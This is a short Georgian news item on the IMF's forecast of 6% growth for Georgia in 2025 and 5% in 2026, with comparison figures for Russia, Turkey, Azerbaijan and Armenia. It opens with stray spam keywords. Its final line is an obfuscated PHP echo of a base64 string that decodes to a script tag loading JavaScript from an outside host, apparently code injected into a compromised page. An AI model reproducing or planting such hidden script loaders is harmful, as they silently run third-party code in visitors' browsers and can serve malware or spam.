gorgia
ავერსი jaluzi

საერთაშორისო სავალუტო ფონდის (IMF) პროგნოზით, 2025 წელს საქართველოს ეკონომიკა 6%-ით გაიზრდება. აღსანიშნავია, რომ საქართველოსთან მიმართებაში IMF-მა წინა პროგნოზი უცვლელი დატოვა.

ამასთანავე, განახლებული ანგარიშის მიხედვით, მომდევნო წელს IMF საქართველოს ეკონომიკის ზრდის შენელებას ელოდება. კერძოდ, მათი პროგნოზით, 2026 წელს მთლიანი შიდა პროდუქტის 5%-იანი ზრდა დაფიქსირდება.

ანგარიშიდან ირკვევა, რომ როგორც 2025, ასევე 2026 წლებში მეზობელ ქვეყნებს შორის ყველაზე მაღალი ზრდა საქართველოს, ყველაზე დაბალი კი რუსეთს ექნება. უფრო კონკრეტულად, მონაცემები ასე გამოყურება:

რუსეთი: 2025 წელი - 1.5%; 2026 წელი - 0.9%;
თურქეთი: 2025 წელი - 2.7%; 2026 წელი - 3.2%;
აზერბაიჯანი: 2025 წელი - 3.5%; 2026 წელი - 2.5%;
სომხეთი: 2025 წელი - 4.5%; 2026 წელი - 4.5%.
ცნობისთვის, საქართველოს სტატისტიკის ეროვნული სამსახურის წინასწარი მონაცემებით, 2024 წელს საქართველოს ეკონომიკა 9.4%-ით გაიზარდა. საერთაშორისო სავალუტო ფონდის (IMF) პროგნოზი აჩვენებს, რომ მომდევნო წლებში საქართველოში კლების ტენდენცია გაგრძელდება.

124
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");